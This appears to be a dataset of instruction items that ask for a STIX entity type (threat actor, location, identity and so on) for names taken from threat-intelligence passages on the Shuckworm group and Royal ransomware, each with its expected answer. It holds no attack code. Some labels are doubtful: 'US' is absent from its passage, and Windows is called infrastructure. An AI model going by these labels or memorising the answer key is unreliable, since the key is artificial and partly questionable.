[
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nUS\n\n---\n\n### Text Passage:\nAttackers heavily focused on acquiring military and security intelligence in order to support invading forces.\nThe Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.\nIn some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.\nIn a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.\nShuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).\n",
"output": "LOCATION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nRussia\n\n---\n\n### Text Passage:\nAttackers heavily focused on acquiring military and security intelligence in order to support invading forces.\nThe Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.\nIn some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.\nIn a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.\nShuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).\n",
"output": "LOCATION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nShuckworm\n\n---\n\n### Text Passage:\nAttackers heavily focused on acquiring military and security intelligence in order to support invading forces.\nThe Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.\nIn some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.\nIn a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.\nShuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).\n",
"output": "THREAT_ACTOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nRussian Federal Security Service\n\n---\n\n### Text Passage:\nAttackers heavily focused on acquiring military and security intelligence in order to support invading forces.\nThe Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.\nIn some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.\nIn a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.\nShuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nUkraine\n\n---\n\n### Text Passage:\nAttackers heavily focused on acquiring military and security intelligence in order to support invading forces.\nThe Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.\nIn some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.\nIn a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.\nShuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).\n",
"output": "LOCATION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nGamaredon\n\n---\n\n### Text Passage:\nAttackers heavily focused on acquiring military and security intelligence in order to support invading forces.\nThe Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.\nIn some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.\nIn a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.\nShuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).\n",
"output": "THREAT_ACTOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nArmageddon\n\n---\n\n### Text Passage:\nAttackers heavily focused on acquiring military and security intelligence in order to support invading forces.\nThe Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.\nIn some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.\nIn a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.\nShuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).\n",
"output": "THREAT_ACTOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nFSB\n\n---\n\n### Text Passage:\nAttackers heavily focused on acquiring military and security intelligence in order to support invading forces.\nThe Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.\nIn some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.\nIn a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.\nShuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nWindows\n\n---\n\n### Text Passage:\n**Command and Control**\nOnce Royal actors gain access to a network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold within the victim\u2019s network. Ransomware operators often use open source projects to aid their intrusion activities\u2014Royal operators have recently been observed using `Chisel`, a tunneling tool transported over HTTP and secured via SSH [T1572], to communicate with their C2 infrastructure. FBI observed multiple Qakbot C2s used in Royal ransomware attacks but is yet to determine if Royal ransomware exclusively uses Qakbot C2s.\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nRoyal\n\n---\n\n### Text Passage:\n**Command and Control**\nOnce Royal actors gain access to a network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold within the victim\u2019s network. Ransomware operators often use open source projects to aid their intrusion activities\u2014Royal operators have recently been observed using `Chisel`, a tunneling tool transported over HTTP and secured via SSH [T1572], to communicate with their C2 infrastructure. FBI observed multiple Qakbot C2s used in Royal ransomware attacks but is yet to determine if Royal ransomware exclusively uses Qakbot C2s.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nC2\n\n---\n\n### Text Passage:\n**Command and Control**\nOnce Royal actors gain access to a network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold within the victim\u2019s network. Ransomware operators often use open source projects to aid their intrusion activities\u2014Royal operators have recently been observed using `Chisel`, a tunneling tool transported over HTTP and secured via SSH [T1572], to communicate with their C2 infrastructure. FBI observed multiple Qakbot C2s used in Royal ransomware attacks but is yet to determine if Royal ransomware exclusively uses Qakbot C2s.\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nFBI\n\n---\n\n### Text Passage:\n**Command and Control**\nOnce Royal actors gain access to a network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold within the victim\u2019s network. Ransomware operators often use open source projects to aid their intrusion activities\u2014Royal operators have recently been observed using `Chisel`, a tunneling tool transported over HTTP and secured via SSH [T1572], to communicate with their C2 infrastructure. FBI observed multiple Qakbot C2s used in Royal ransomware attacks but is yet to determine if Royal ransomware exclusively uses Qakbot C2s.\n",
"output": "IDENTITY"
},
{
